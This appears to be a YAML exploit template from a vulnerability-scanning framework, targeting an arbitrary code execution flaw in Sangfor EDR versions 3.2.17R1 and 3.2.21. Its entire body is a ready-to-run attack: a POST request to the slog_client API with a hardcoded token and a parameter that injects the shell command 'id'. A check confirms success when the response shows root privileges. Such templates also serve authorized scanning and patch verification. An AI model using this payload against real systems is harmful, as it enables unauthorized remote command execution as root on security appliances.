product: 深信服EDR
vName: 深信服EDR 3.2.21任意代码执行
type: 代码执行
vID: [ ]
level: 3
vDesc: ''
version: Sangfor EDR 3.2.17R1/3.2.21
note: ''
search: { }
protocol: http
link: https://www.cnblogs.com/0day-li/p/13650452.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /api/edr/sangforinter/v2/cssp/slog_client?token=eyjtzduionrydwv9
      header:
        Content-Type: application/x-www-form-urlencoded
      data: '{"params":"w=123\"''1234123''\"|id"}'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - uid=0(root)
            logic: and
          header:
            value:
              - Content-Type
              - json
            logic: and